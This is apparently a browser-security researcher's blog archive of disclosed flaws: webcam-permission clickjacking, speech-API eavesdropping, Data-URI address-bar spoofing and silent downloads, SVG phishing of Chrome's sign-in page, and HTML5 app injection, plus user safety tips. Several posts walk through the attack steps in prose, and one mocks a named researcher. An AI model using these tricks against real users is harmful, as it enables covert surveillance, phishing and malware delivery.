Category Archives: Security

Webcam spying with Chrome

tl;dr;

Browsers doesn’t handle webcam permissions well enough. Users should be extremely wary about what’s going on in their browser. From a list of 30 bugs submitted to google regarding that issue, most have been fixed, but some are still alive.
The most obvious bug which is still live and kicking in all of the browsers is PopJacking which is  – clickjacking using popups. This flaw can be abused to trick users into allowing malicious access to their webcam, for example.

Video of the 5 POCs is here

Full text

More than a year ago (6.6.2014) I submitted a list of ~30 security bugs regarding the way Chrome handle WebCam access . These bugs were also regarding the way Chrome handled almost all other kind of special permissions. From webcam/mic access to location.

Some of these were related to bugs and bad implementation of popups and abusing it in relation to webcam access.

Yesterday Google made my bug report public so I figured it’s about time I’d share my findings (all of these links and info were private until now):

This is the original post I privately sent to Google, it has the info

A video with 5 different POCs

The POC and source code

The bug thread on google

While Google fixed most of these bugs some of these are still unfixed. But, even these who were fixed are not fixed good enough and are still vulnerable to PopJacking. Meaning, an attacker can still trick a user to allow webcam access – pretty easily.
PopJacking is merely clickjacking using a popup – probably the most overlooked flaw in browsers since clickjacking.

Another side note here is about Google behaviour regarding this bug:
At first they seemed thrilled about it, but than it took them almost a year to fix most of it. Only to eventually declare it as “Wontfix”.
One of the bug I submitted was opened as a different private bug  but, anyone can easily figure which one it is from the conversation in the currently opened bug thread.

From the way Google dealt with this bug and some other security bugs myself and others have submitted, it’s clear that Google will greatly prefer to dismiss security bugs as “Wontfix” or “not a bug”. Anything other the RCE or XSS will have difficulty to fit in.
I’m pretty sure that something like Clickjacking would have been immediately dismissed, only to realise afterwards the mistake that has been done.
More on that with some examples in a latter post.

So are we safe now?

– No.
It’s still too damn easy to trick a user to allow something like webcam access, and that’s valid to other browsers not just Chrome. Be extremely wary of where you click and what’s going on in your browser at all times. The indication that a website is accessing your camera is not clear enough – you gotta be wary. (FireFox indication is much better, btw)

Popups are evil

Beside the specific security bugs in popups and the way it can be exploited for PopJacking.
I would argue that there is not even one legitimate use of browser popups in term of user-experience.

Browser vendors should just kill popups all together, forever.

 

The never ending browser sessions

tl;dr;

The concept of session memory is not valid anymore in today’s browsers. Even sessionStorage is not cleared after closing the tab. It’s easily revived when clicking on “Reopen closed tab”. That might seem as a bug – not if you look at the spec which is rather permissive, maybe too much.

So what’s the problem really?

Imagine you login to your bank website from a trusted 3rd party computer.
When you’re done, you simply click the X button to close the site assuming that you’re session will be done. This used to be true for many years, since it was common for critical websites like banks to store the authentication token in a session-cookie.
And session cookies, as the name implies are gone when the session is gone. The problem is that with tab browsing, and browsers running in the background that session might end long time after you clicked on the X.
This means that most of the time, anyone accessing that computer after you, will be able to continue where you left – logged in as you.

sessionStorage to the rescue? – not really

So if session-cookies are not good enough, what about that shiny sessionStorage?
It’s isolated per tab and cleared when that tab is closed.
It must be good – you click the X and it’s gone.
Well almost…
In Chrome and Firefox the session storage is easily revived with right click and “Reopen closed tab” and “Undo close tab” respectively.

This strange and unexpected behavior of the sessionStorage is still complying with the spec which is somewhat over permissive:
“The lifetime of a browsing context can be unrelated to the lifetime of the actual user agent process itself, as the user agent may support resuming sessions after a restart.”

We can argue whether this is a bug or not, but it’s definitely a bad feature and should be mitigated. We should have real session storage which we can trust to be cleared when we click on the “X”. Without unreliable tricks like onbeforeunload and alike.

Here’s a demo, close the tab and reopen it with “Reopen closed tab”  – the sessionStorage will be revived.

While Chrome and FireFox are acting badly and revive the sessionStorage, Safari and IE11 don’t revive it and are the safer browsers in that regard.

Bottom line

As a user, always always logout manually, never rely on just closing the tab or the browser.

As a developer, the only way to create real sessions that are gone when the user closes the tab is to keep anything critical in the memory and only in the memory. I’ve written more about it with examples in here.

 

Sharing sessionStorage between tabs for secure multi-tab authentication

tl;dr;
I’ve created mechanism that will leverage the secure nature of the browser sessionStorage  or memoryStorage for authentication and will still allow the user to open multiple tabs without having to re-login every time.

A refresher about relevant browser storage mechanism

  1. localStorage ~5MB, saved for infinity or until the user manually deletes it.
  2. sessionStorage ~5MB, saved for the life of the current tab
  3. cookie ~4KB, can be saved up to infinity
  4. session cookie ~4KB, deleted when the user closes the browser (not always deleted)

 

Safe session-token caching

When dealing with critical platforms it is expected that the session is ended when the user closes the tab.
In order to support that, one should never use cookies to store any sensitive data like authentication tokens. Even session-cookies will not suffice since it’ll continue to live after closing the tab and even after completely closing the browser.
(We should anyway consider to not use cookies since these have other problems that are need to be dealt with, i.e. CSRF.)

This leaves us with saving the token in the memory or in the sessionStorage. The benefit of the sessionStorage is that it’ll persist across different pages and browser refreshes. Hence the user may navigate to different pages and/or refresh the page and still remain logged-in.

Good. We save the token in the sessionStorage, send it as an header with every request to the server in order to authenticate the user. When the user closes the tab – it’s gone.

But what about multiple tabs?

It is pretty common even in single page application that the user will want to use multiple tabs. The afordmentioned security enahncment of saving the token in the sessionStorage will create some bad UX in the form of requesting the user to re-login with every tab he opens. Right, sessionStorage is not shared across tabs.

Share sessionStorage between tabs using localStorage events

The way I solved it is by using localStorage events.
When a user opens a new tab, we first ask any other tab that is opened if he already have the sessionStorage for us. If any other tab is opened it’ll send us the sessionStorage through localStorage event, we’ll duplicate that into the sessionStorage.
The sessionStorage data will not stay in the localStorage, not even for 1 millisecond as it being deleted in the same call. The data is shared through the event payload and not the localStorage itself.

Demo is here

Click to “Set the sessionStorage” than open multiple tabs to see the sessionStorage is shared.

Almost perfect

We now have what is probably the most secure way to cache session tokens in the browser and without compromising the multiple tabs user-experience. In this way when the user closes the tab he knows for sure that the session is gone. Or is it?!

Both Chrome and Firefox will revive the sessionStorage when the user selects “Reopen closed tab” and “Undo close tab” respectively.
Damn it!

Safari does it right and don’t restore the sessionStorage (tested only with these 3 browsers)

For the user the only way to be completely sure that the sessionStorage is really gone is to reopen the same website directly and without the “reopen closed tab” feature.
That until Chrome and Firefox will resolve this bug. (my hunch tells me that they will call it a “feature“)

Even with this bug, using the sessionStorage is still safer than session-cookie or any other alternative. If we’ll want to make it perfect we’ll need to implement the same mechanism using memory instead of sessionStorage. (onbeforeunload and alike can work too, but won’t be as reliable and will clear also on refresh. window.name is almost good , but it’s too old and has no cross-domain protection)

Sharing memoryStorage between tabs for secure multi-tab authentication

So… this will be the only real safe way to keep an authentication token in a browser session and will allow the user to open multiple tabs without having to re-login

Close the tab and the session is gone – for real this time.

The downsides is that when having only one tab, a browser refresh will force the user to re-login. Security comes with a price, obviously this is not recommended for any type of system.

Demo is here

Set the memoryStorage and open multiple tabs to see it shared between them. Close all related tabs and the token is gone forever (memoryStorage is just a javascript object)


P.S.
Needless to say that session management and expiration should be handled on the server side as well.

To Listen Without Consent – Abusing the HTML5 Speech

tl;dr;
I found a bug in Google Chrome that allows an attacker to listen on the user speech without any consent from the user and without any indication. Even blocking any access to the microphone under chrome://settings/content will not remedy this flaw.

Try the live demo… (Designed for Mac  though it will work similarly on any other OS)

Watch the video…


The Sisyphus of computer science

Speech recognition is like the Sisyphus of computer science. We came a long way but still haven’t reached the top of that hill. With all that crunching power and sophisticated algorithms, computers still can’t recognise some basic words and sentences, the kinds that the average human digest without breaking a sweat. This is still one of the areas that humans easily win over computers. Savor these wins, as it will not last much longer;)

One must appreciate Google for pushing this area forward and introducing speech recognition into the Chrome browser. The current level of speech support in Chrome allows us to create application and websites that are completely controlled form speech. It open vast possibilities – form general improved accessibility to email dictation and even games.

The current speech API is pretty decent. It works by sending the audio to Google’s servers and returns the recognised text. The fact that it sends the audio to Google has some benefits, but from applicative point of view it will always suffer from latency and will not work offline. I believe that the current speech support was introduced with Chrome 25. From Chrome 33 one can also use Speech Synthesis API. – Amazing!

But…
Before this fine API we currently have, Google experimented with an earlier version of the API. It works quite the same, the main difference is that the older API doesn’t work continuously and needs to start after every sentence. Still, it’s powerful enough and it has some flaws that enable it to be abused. I believe this API was introduced with Chrome 11 and I have a good reason to believe it was flawed since than.


More Technical Details

Basically, this attack is abusing Chrome’s old speech API, the -x-webkit-speech feature.
What enable this attack are these 3 issues:

  1. The speech element visibility can be altered to any size and opacity, and still stay fully functional.
  2. The speech element can be made to take over all clicks on the page while staying completely invisible. (No need to mess with z-indexes)
  3. The indication box (shows you that you’re being recorded) can be obfuscated and/or be rendered outside of the screen.

The  POC is designed to work on Chrome for Mac, but, the same attack can be conducted to work on any Chrome on any OS.

This POC is using the full-screen mode to make it easier to hide the “indication box” outside of the screen.
It is not mandatory to use the HTML5 full-screen; it’s just easier for this demo.

As you can see in the demo and video there is absolutely no indication that anything is going-on. There are no other windows or tabs, and no some kind of hidden popup or pop-under.
The user will never know this website is eavesdropping.

In Chrome all one need in order to access the user’s speech is to use this line of HTML5 code:
<input -x-webkit-speech />

That’s all; there will be no fancy confirmation screens. When the user clicks on that little grey microphone he will be recorded. The user will see the “indication box” telling him to “Speak now” but that can be pushed out of the screen and / or obfuscated.

That is enough in order to listen to the user speech without any consent and without giving him any indication. The other bugs just make it easier but are not mandatory.

(For the tree in the demo I have used a slightly altered version of the beautiful canvas tree from Kenneth Jorgensen)

— The bug was reported to Google.

grey_mic

Found a CSRF Flaw in a Big E-Commerce Website

tl;dr

I stumbled upon some CSRF flaws in a very popular e-commerce website. CSRF flaws are generally overlooked and the only way for you as the user to minimize the risk is to logout from a website after you finished using it. This will limit the window of being vulnerable to attacks to the time you spend on a website. I have disclosed my finding to the e-commerce website and will post it here after they’ll finish fixing it.

This is how these CSRF flaws generally works

When you login to a website you get back a cookie that indicates who you are and the fact that you are authenticated.
Now, for better user experience and so you won’t need to re-login, most websites tell your browser to keeps the cookie for very very long time (up to 10 years is considered safe).
The problem is that if a website suffers from any CSRF flaws, and many still do, from now-on every-time you visit any unrelated internet content it may be attacking you. Think of all these slightly phishy content you stumbled upon over the past years, some of it could have been attacking you.

A famous case of CSRF attack against a bank was using a legitimate AD and abused a flaw in the bank website to transfer user’s money. Gmail suffered from a CSRF flaw in its early days, leaking all of its user’s contacts.

CSRF flaws are used to steal sensitive data from users and to perform actions on the user’s behalf. The flaw I found enables both – an attacker can steal user’s personal data and also mess with his assets.

How I stumbled upon it

I was surfing on an open public WiFi – generally a bad thing to do but I needed to. This public WiFi had a phishy name “eyes2” and there are few other “eyes” circling around – “eyes1”, “eyes2”, “eyes3”, etc’. Call me paranoid but it seems to me that these access points were put there in order to eavesdrop. Might be just for fun might be more. Anyhow, I generally don’t care as long as I keep all of my traffic in SSL. I don’t care them getting my metadata. So I went to this huge e-commerce website just to check something and was amazed it’s not all SSLed. Wow… I wondered… what kind of data have I just leaked to the MITM from the “eyes2” access point?! Apparently, if someone is eavesdropping on my connection he now knew exactly who I am and more.

The fact that any website that deals with even slightly sensitive data, and doesn’t use SSL for all of its traffic is a flaw on its own. But SSL is not related to these specific flaws, in fact using SSL doesn’t help to prevent CSRF flaws. It’s only because I wanted to know exactly what kind of data this website leaked by using plain http and not https (SSL), I found out it’s also vulnerable to CSRF attacks.

Where are all the details?

I reported my finding to the e-commerce website. It took me way longer to find the appropriate way to contact them than to find the flaws and PoC it. I did eventually managed to report it and they were very responsive about it and seemed like they already started to fix it. I will post all the details after they’ll finish fixing it.

As a website owner it’s important to remember to implement CSRF prevention from the get go. Most web frameworks have their own solutions already. It’s very easy to overlook it. It’s very easy to use something like JSONP and to forget how vulnerable it can be, for example.

How to protect yourself

CSRF is generally based on cookies, what you can do to protect yourself is to logout or delete your cookies after you finished using a certain website. That won’t be bulletproof since you’ll still be vulnerable to attacks while you’re logged-in. The only way to be completely safe is to use only 1 window with only 1 tab while you are logged-in.

Obviously all of this is a complete hassle, and website owners should be the ones responsible for their CSRF flaws. The user can’t be expected to do it.

If your using firefox you may use something like noscript, which also involve some level of annoyance.

Abusing The HTML5 Data-URI

[Update: Some of these examples were mitigated in Chrome 38 and 39]

After seeing in the previous post how Data-URIs can be used as a mechanism to easily carry malicious code, I’ll elaborate more about the issues it presents.

Some of it merely exists from the way Data-URIs are designed and implemented, and some of it might be considered as security bugs in the browsers.

Using Data-URI to manipulate the address bar

The simplest thing an attacker can do is to add spaces after the “data:” in the URI and by that it can make it look like it some kind of a Chrome internal page.

It will also change the link status in the bottom of the browser. The link will show “data:” hiding all the base64 code that is there. It’s a way to manipulate the status bar without the need of JavaScript. Hence the link will be manipulated even in an environment that doesn’t allow JavaScript.

Combine that attack with the previous example of the phishing SVG and you can get catastrophic results. Lots of users might believe this is an internal Chrome page.

Live example (Open in Chrome)

data_address_bar

While in the above example the user will see only “data:..” in the address bar. If he’ll feel uncomfortable the user can still examine the address bar and might find the hidden base64 code.

The next example will show how to prevent the user from examining the address bar at all, and it’ll always show “data:” The 3 dots indicating there might be more to it – will be removed as well.

By making the original content larger than ~28KB the address-bar will always show “data:” and only data.

data_status_bar

Live example of only data in the address-bar (Open in Chrome)

data_big_address_bar

While Chrome is the most vulnerable to the Space attack, other browsers will fall for it too.

FireFox trim the spaces when you click on the link, but an attacker will still be able to manipulate the status-bar (at the bottom of the browser). As we’ll see in the next vector.

Safari doesn’t trim the spaces but instead convert it to %20 or any other Unicode escaped representation of a space. It’ll work with any combination of unicode spaces.

data_safari_address_bar

Mobile Chrome for iOS.  It was a bit surprising to see that the Chrome version for iOS will fall for the “Over 28KB base64” attack.

data_chrome_iphone

It interesting to see that even Chrome for iOS which is very different environment, share the shell code with all of the other Chrome browsers.


Tricking the user to download malicious content using the DATA URI

We already seen how one can abuse the browser’s address-bar and the status-bar by simply adding spaces after the “data:” in the link.

But what if we add any other character, other than space.  In that case, the users will be prompted to download a file (by default the user won’t be prompted and the file will just download)

How convenient for an evil one. Combining that with the previous stuff…

The user will see data:http://google.com/graphics/doodle.svg in the status-bar, clicking the link will automatically download the attacker’s malicious SVG file that is hiding in the base64 code inside the link.

data_doodle_chrome

Click to download doodle.svg (not really a doodle)

As noted before, FireFox trim the spaces after the “data:”, but one can use %20 instead. Also, FireFox does a good job and put an ellipsis in the middle of the link in the status-bar. So the user will see the suspicious gibberish base64 at the end, But that can easily overcome with simply adding spaces at the end of the link as well.

data_doodle_firefox

Click to download doodle.svg (FireFox version)

The interesting thing is that this kind of attack doesn’t limit us to SVG, any kind of file can be downloaded this way, any kind of binary file as well.

How about an EXE (that EXE does nothing but to echo some text to the terminal)
(Will add it latter)

Remember COM executables? Only few bytes, 32bit windows will still run it, still many of these are out there.

COM executable

ZIP is a great bad vector IMHO

ZIP with badies inside (not real badies just text files)

chrome_zip_download

While on windows an attacker will also need to trick the user to change the extension of the file or to make him “Open With…” the file with a certain app. On the MAC these extension doesn’t matter much.

The file will be opened or executed according to its real type.

The new Mac OSes have this great feature called Gatekeeper that makes running applications way more secure in general.

The default settings is “from app-store AND identified developers”. How difficult is it for a motivated attacker to become an “Identified Developer”?

If the user have disabled Gatekeeper the app will just run when clicked.

It will probably work on old macs, but anyway I think that the most dangerous attack will be using just a zip file with all kind of badies inside.

The user flow might be:

  1. Click on a link -> File is immediately downloaded (there is no wait as the file is already embedded no the page)
  2. Click on the downloaded file -> file is automatically extracted (if the zip is small enough the user won’t notice much going on as the extraction will be fast)
  3. Malicious apps will be spread all over the user’s Downloads folder.
  4. “Hopefully” one day the user will notice these apps and its inviting names and will run one of these – thinking he downloaded it himself.

These are most of the browsers I’ve tested on, other browser may behave differently, generally it works the same on ubuntu as well.

IE (Internet Explorer) – does not suffer form most Data-URIs flaws, it does it by not supporting most of its features.  I don’t think that getting away with it by not supporting it is generally a good thing.

Final notes about these vectors: (repeating some from the previous post)

  1. Remember that no JavaScript is needed for any of this, all that is needed is a link. It’ll work just the same with JavaScript disabled.
  2. No server is involved either.
  3. All an attacker need is a bunch of strings and the user’s browser will do all the rest.
  4. AV won’t scan these links.
  5. Not easily blockable – no domain to block.
  6. More easily shared and distributed.
  7. The attack is also cached in the browser history and doesn’t need Internet connection to be present at the moment of the attack.
  8. Will propagate across devices. For example, if you’re signed-in into Chrome the attack will propagate to all of your devices. (You’ll still have to run it on each device though, just type data in the address bar).
  9. Can be easily embedded in the naively looking *.URL file. Who doesn’t click on these? It always felt safe.

 

— Reported the bug to Google.

SVG For Fun and Phishing

What an awesome format is SVG, so powerful and so well supported by browsers. And yet it is barely being used, it’s not getting the love it deserves. Well, browsers love SVG, perhaps too much…

SVG files are like little bundles of joy. Encapsulating graphics, animations and logic. One can write a full app or game all encapsulate in one SVG file. That SVG file can be compressed into a binary file with the extension of SVGZ and browsers will still accept it.

Its way less powerful than Flash but the concept is similar – vector graphics and logic in one binary file. And like Flash SWF files – these files tend to get viral and to be re-distributed. And by that I mean, once you release your attack in the wild it can get hosted from many other servers. A good example would be, tiger.svg.

Remember the lovely Flash dog?  It can work just the same and even worse.

SVG also run from local files. By default, on Windows, SVG files are opened in IE, which will run the script with local privileges when it’s double clicked. 

Anyhow, SVGs have some flaws built in into them; many are known some are new. I will argue that even without the new flaws an SVG file is somewhat dangerous by-design. I wanted to see how easy it would be to abuse SVG for phishing. I picked an easy target – Chrome’s “Sign In” page. It was pretty easy to create an almost fully functional version of the Chrome Sign In page.

Check it out only 5kb of SVG “Image”

Compressed as an SVGZ, only 2kb (Chrome will run it just fine) 

Note: Google already changed the appearance of this page, but it almost identical to the previous version.

This page is generally here  (google already changed the way it looks)

Letting SVG files execute JavaScript is actually the root of the problem. I’m not sure it serves any real purpose in today’s web.

A simple attack might goes like this:

  • The attacker will send the victim an email with a malicious SVG file “Checkout this cool image / animation”.
  • The victim will downloads the SVG and click / double click on it.
  • SVG is opened in the browser.
  • Attack taking place.

The JavaScript that will run will have local privileges and can easily attack the user (limited to the browser sandbox of course). It can for example – execute multiple cross-domain CSRF attacks (cookies are sent normally with every requests) and/or load multiple other attack vectors. Can be abused for spam, and that is not even illegal as long as long as the attacker doesn’t do anything too malicious.

You may be thinking “so what?!” you can script the user from an html page just as well.

There are few differences, as most users will look at SVG file as just another image.

  1. When you double click on an image to view it can’t execute anything –SVG can.
  2. SVG files get redistributed – there are numerous clip art sites that will host the evil SVG for the attacker.
  3. The malicious code embedded in SVG files will sustain after editing the file in graphic editors like Adobe Illustrator and Inkscape.

I would say that the main problem here is not what SVG files are capable of doing, and it’s more about the way they can get malicious code slip through the user’s normal defenses.

Wait there is more…


Even more fun with SVG and HTML5 Data-URI

Another great feature of HTML5 is Data-URI. Now, SVG is working great with Data-URI. Malicious SVG works amazingly great with data-URIs.

SVG encoded, as Base64 will run directly from a link.
Some might call this a feature but it can be exploited for phishing attacks.

POC of an SVG phishing attack embeded in an HTML5 Data-URI

Some of the attacker benefits are:

  1. This is just a link, no need to host anything.
  2. AV won’t scan these links.
  3. Not easily blockable – no domain to block.
  4. More easily shared and distributed.
  5. The attack is also cached in the browser history and doesn’t need Internet connection to be present at the moment of the attack.
  6. Will propagate across devices. For example, if you’re signed-in into Chrome the attack will propagate to all of your devices. (You’ll still have to run it on each device though, just type data in the address bar).
  7. Can be easily embedded in the naively looking *.URL file. Who doesn’t click on these? It always felt safe.

Everything said here is valid to all Data-URIs supported formats; notable is also text/html:
Here is an example

Actually Data-URIs have their own set of problems, which are not necessarily related to SVG. It works perfectly with SVG but the issues are more general. I’ll elaborate more in another post.

More about the demo (Chrome Sign In)

I don’t want give too many ideas for the bad guys, but the possibilities here are endless, I can already think of far more nasty vectors than this demo.

This specific demo has an image of the Google logo. I managed to create the Google logo as an SVG in about 7kb, but the Google logo in the demo is anyhow small and not too noticeable, it felt like a waste of KBs.

I found that the font used be Google for their logo is catull, which is an old style serif typeface, and is similar to … you guessed it… Georgia, that was good enough. Georgia is preinstalled on all OSs.

I know that might look horrible to fonts and esthetics lovers, but the average victim will easily fall for it.

One of the most important features of this attack is the SVG text-input. The user will need to enter his credentials somewhere.

Text-inputs are not natively available in SVG, though there were some attempts to create them.

I didn’t create fully functional text-inputs, didn’t think it’s appropriate for me to do it at this point – for various reasons. For one, I didn’t want to make it too easy to replicate this attack in the real. I’m sure that nearly perfect SVG text-inputs can relatively easily be created – one just need enough motivation.

What about mobile?

Smartphones are just fine with SVG, more on that later as well.

Some tip to keep you safe

  1. Be alert when clicking on links that direct to SVG files or Data-URIs.
  2. Don’t double-click on SVG files to preview it in your browser.
  3. Don’t preview unknown or unchecked SVG files in your browser.
  4. Don’t export SVG from Adobe Illustrator and Inkscape without knowing where it came from and making sure it has no malicious script.

Protecting Your Smart Phone, the Basics

iPhone

  1. Don’t jailbreak, a not jailbroken iPhone is a pretty secure device.
  2. Use PIN code Settings -> General -> Passcode (and not something like 1234)
  3. Make sure data is really encrypted – default since iPhone 4 (which have hardware encryption). If you have an older version go to Settings -> General -> Passcode and look for “Data Protection is Enabled” on the bottom.
  4. Don’t install any profiles you’re not absolutely sure about. I saw that some ads company started to use these profiles in order to overcome the App Store restrictions. If you see something like this don’t approve it unless your absolutely sure. Here’s some more info about the danger of malicious profiles.
  5. Consider using alphanumeric passcode by setting “Simple Passcode” to “Off”
  6. Don’t use Consider not using “Find My iPhone”. This is a trade off, “Find My iPhone” is really great tool for finding your lost phone. But, there is a 1 failure point which is your apple ID. Accessing it will gives attackers your exact position and an easy way to wipe all of your phone data.

Android

  1. Don’t root your phone
  2. Use a screen lock
  3. Encrypt data – works better from Android 4.0 and above, might affect performance (it does not encrypt external SD card)
  4. Use a security app like Lookout or AVast – it’s free!
  5. Don’t install an app unlesss you have decent amount of confidance in it, also check the permisisons it requires. Remeber to uninstall it if it’s useless.

We all know that Android is open and its apps needs no approval, which make it more vurenable by nature. This openness has another aspect of vurnability, external SD cards will have variant quality and because of that the Android OS doesn’t encrypt it. It can’t promise a good enough performance on cheap external memory. Which make sense in a way, your somewhat compromising security by being open.

Windows 8 Phone
Never had a windows 8 phone only 7.5, but it’s obvious that Microsoft is batting big on their most loyal enterprise consumers, that need enterprise security. From reading online it seems that it has a built in encryption but not for the SD card (same as Android).

Common sense still applies.

  1. Use screen lock 
  2. Encryption is built in for you, just don’t save anything important on the external SD card.

HTML5 Mobile Apps – Injection Heaven, Security Hell

Three weeks ago Path.com was fined for stupidly stealing their user’s contact list and saving it onto their servers. Path’s doing was obviously wrong but I’m not sure that their punishment was really justified, needing to pay this enormous bribe to the FTC using COPPA as an excuse. The lesson here is to always comply with COPPA.

Anyhow, in that same techcrunch article you can also find that “The FTC also took the opportunity to introduce a new set of guidelines for mobile developers“. Although they explain early in that article that it’s not meant to be a guideline, I still feel they misses a lot.

When it comes to HTML5 apps even the simplest app can greatly compromise the user privacy and security. If we’ll take the FTC example of a simple and harmless alarm clock app, If that app is built using HTML5 its size and complexity doesn’t matter. All that is needed is one javascript injection that will pass thorough.

How will that code be injected you may ask – all that is needed is for the app to load some content from a remote server the simplest example will be the “Terms And Condition” page which is mostly loaded into a WebView. It can be a more “complex” settings, like choosing the favorite color or loading the saved alarms. Any kind of sharing will probably be way more open to be exploited, i.e. “share your favorite alarms”. Push messages might also bring malicious code. ETC’

The bottom line is that any injection of javascript will give an attacker a lot of control over the device, more often than not it’ll be persistant. HTML5 apps usually use the localStorage that is rarely flushed, and leverage native DBs and the file system. The “page” or webview is rarly refreshed, so even if the injection is not persistant it’ll be alive for a long time.
Things like stealing the user’s contact list and tracking the user location are pretty common. Enabled by default in iPhone PhoneGap for example.

It’s only limited by the native API that is opened to Javascript, generally it’s very open, even more than the PhoneGap default API. I know of at least 1 popular HTML5 app that opens almost all of the Android native API.

You see, Javascript is one tough beast – it can run almost anywhere.
Javascript was designed basically as a none important sidekick to the browser’s HTML, “it should not cause any problems by being poorly written and should fail silently and not interfere with the main thing that is HTML.” Seriously that how it was, we’re lucky it’s not case insensitive. I’m sure that back than some people though it’ll make it simpler and better.
So, Javascript will run in any dom element no matter how naive you may think it is, it will run in unexpected parts of the element without needing the <script> tag, i.e. onerror=”attack()”. It used to even run from CSS and from images, but we’re over that now asfaik in mobile browsers.

As opposed to that, it’ll take a very special case for injection to be able to execute arbitrary native code. You can make a native android app that will run anything – even get root, but I doubt that any legitimate app regularly download strings and run it as commands. (basically on rooted Android you can do exec(“su”) and everything else)

With Javascript the app does not need to be designed in any special way, an unsanitizes string will likely to execute.

These kind of injection are not the sole problem of PhoneGap based applications.
Any app that uses HTML5, even if it’s mostly native, any API that is opened to javascript can be leveraged by an attacker.

Phonegap (Cordova) has a mechanism to white list remote hosts which is really only effective on the iOS. It adds a little bit of security, but many apps anyway uses a wildecard “*” to allow all hosts. The wildcard is used by default in the phonegap cloud (saas solution to build phonegap apps)

As you can see the option for an attacker are enourmoe, all it needs is one vector of injection and there is an open path (no phan) to take over all of the devices of all of the users.

HTML5 apps that runs inside the mobile browser are also a nice target for injection attacks, althouygh it’s lacking most of the native api, there is still access to location in all mobile browsers. It’s less powerful for the attacker since it’ll prompt the user way more vigusly.
The Dolphin Mobile Browser implement the full phonegap native api, for example (which is generally a good thing), but it makes in-the-browser websites and apps more exposed to attacks.

So what to do than?!
– Sanitize sanitize sanitize all user input, server and client!

Say What, Flash is More Secure Than HTML5?!

So my favorite script kiddy and copycat, Feross (copied, note the shameless “I discovered” in his Quora post, LoL)
Found a social engineering flaw in the HTML5 fullscreen mode that can be used for phishing attacks. This time it might be even his own finding… what do you know 😉

This flaw is very much similar to the well known and very old picture-in-picture
Picture-in-Picture Phishing Attacks and Operating System Styles
More info..
IMHO the old version is still way more dangers for phishing.

So How Flash is more secure?

What enables this HTML5 fullscreen flaw to exist in his prime is the fact you have full keyboard access. This way an attacker can more easily steal the user’s credentials.
After all fullscreen was existant in Flash for many years now, yet it was never compromised this way. The main reason is that Flash is more secure is that it does not allow full keyboard interaction in fullscreen.

Good thinking Adobe, taking care our security… oh wait… Flash was added with this feature with version 11.3… after all Flash can’t be left behind…
Working demo…

Damn… but still Flash gives you a decent popup confirmation which HTML5 doesn’t

Yeah, I know Chrome give you a popup too, but you don’t have to click on it to get FULL keyboard access.
I constructed this “amazing” demo here (chrome only), as you can see you get the message but the keyboard is fully functional and accessible through javascript.

So still Flash is more secure than HTML5 – in that respect.

It takes us back to what me and other were preaching about, that with great power comes great responsibility.
HTML5 have its own flaws and the more powerful it’ll become it will get even more.

Stay tuned…